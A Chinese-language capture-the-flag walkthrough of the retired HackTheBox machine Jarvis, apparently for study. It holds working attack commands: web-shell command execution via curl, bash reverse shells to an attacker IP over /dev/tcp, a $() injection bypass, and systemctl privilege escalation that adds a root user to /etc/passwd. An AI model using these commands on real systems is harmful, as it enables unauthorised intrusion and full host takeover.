本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.143
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.143 -o ./Jarvis-autorecon
访问web应用测试发现存在SQL注入
直接写入一句话
通过一句话执行命令
curl -X POST http://10.10.10.143/bmfx.php --data-urlencode exec=whoami
测试没问题直接反弹shell
curl -X POST http://10.10.10.143/bmfx.php --data-urlencode 'exec=bash -c "bash -i >& /dev/tcp/10.10.14.3/8833 0>&1"'
拿到低权限shell之后执行sudo -l
发现了一个python脚本,可以执行ping命令,看了代码过滤了一些常见的命令执行参数,这里可以通过$()进行绕过
切换到用户pepper但是无法回显,使用nc反弹shell然后写入kali的公钥,使用公钥去连接目标普通用户
本地kali 去连接
查找权限是4000的文件
find / -perm -4000 2>/dev/null
发现可以通过systemctl进行提权
systemctl提权 https://www.freedesktop.org/software/systemd/man/systemctl.html https://gtfobins.github.io/gtfobins/systemctl/ echo 'bash -c "bash -i >& /dev/tcp/10.10.14.3/8855 0>&1"' > /tmp/shit.sh 或者直接添加uid为0的用户/tmp/shit.sh /bin/bash echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd 密码为AAAA chmod +x /tmp/shit.sh cd /home/pepper echo '[Service] Type=oneshot ExecStart=/bin/sh -c "/tmp/shit.sh" [Install] WantedBy=multi-user.target' > bmfxshitd.service systemctl link /tmp/bmfxshitd.service systemctl start bmfxshitd.service
